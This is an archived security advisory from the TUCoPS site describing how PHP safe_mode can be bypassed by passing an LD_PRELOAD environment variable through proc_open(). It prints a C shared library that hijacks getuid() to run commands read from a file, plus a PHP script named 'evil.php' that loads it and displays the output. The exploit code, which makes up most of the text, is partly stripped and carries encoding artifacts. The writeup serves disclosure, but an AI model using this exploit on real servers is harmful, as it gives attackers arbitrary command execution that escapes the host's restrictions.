Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: va2026.htm

PHP safe_mode can be bypassed via proc_open() and custom environment.



PHP safe_mode can be bypassed via proc_open() and custom environment.
PHP safe_mode can be bypassed via proc_open() and custom environment.



This *should* work provided that you have met the following requirements:=0D
=0D
1) A writable directory under documentroot to place those files (obviously)=0D
2) You don't have proc_open in your disabled_functions list=0D
3) You are able to compile a shared library on the same platform as the target web server.=0D
=0D
=0D
Here is the library code, compile with cc -o a.so -fPIC -shared a.c=0D
=0D
a.c:=0D
----=0D
=0D
#include =0D
#include =0D
#include =0D
int getuid()=0D
{=0D
char *en;=0D
char *buf=malloc(300);=0D
FILE *a;=0D
=0D
unsetenv("LD_PRELOAD");=0D
a=fopen(".comm","r");=0D
buf=fgets(buf,100,a);=0D
write(2,buf,strlen(buf));=0D
fclose(a);=0D
rename("a.so","b.so");=0D
system(buf);=0D
system("mv output.txt .comm1");=0D
rename("b.so","a.so");=0D
free(buf);=0D
return 0;=0D
}=0D
=0D
*cut*=0D
=0D
=0D
And that is the PHP script:=0D
=0D
evil.php:=0D
-------------------------=0D
 array("pipe", "r"),=0D
 1 => array("file", $path."/output.txt","w"),=0D
 2 => array("file", $path."/errors.txt", "a" )=0D
);=0D
=0D
$cwd = '.';=0D
$env = array('LD_PRELOAD' => $path."/a.so");=0D
$process = proc_open('examplecommand', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed=0D
=0D
=0D
sleep(1);=0D
$a=fopen($path."/.comm1","r");=0D
=0D
echo "
";=0D
while (!feof($a))=0D
{$b=fgets($a);echo $b;}=0D
fclose($a);=0D
echo "
";=0D =0D ?>=0D =0D =0D Why does that work?=0D -------------------=0D =0D Because the PHP devs like to trust the environment. Especially the dynamic loader variables. =0D =0D If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though "yourcommand" is invalid, the LD_PRELOAD variable is passed to /bin/sh.=0D =0D Then /bin/sh loads your "evil" library and then you can easily execute other commands, open files, etc, etc.=0D =0D =0D The library in question overloads getuid() in a way that it takes input from a text file, executes it and writes the output into another text file. =0D =0D This also works against open_basedir restrictions since the library can be under the documentroot.=0D =0D The only tough thing from an attacker's perspective is to compile the library on the same platform as the attacked system.=0D =0D And it works on linux only..=0D =0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH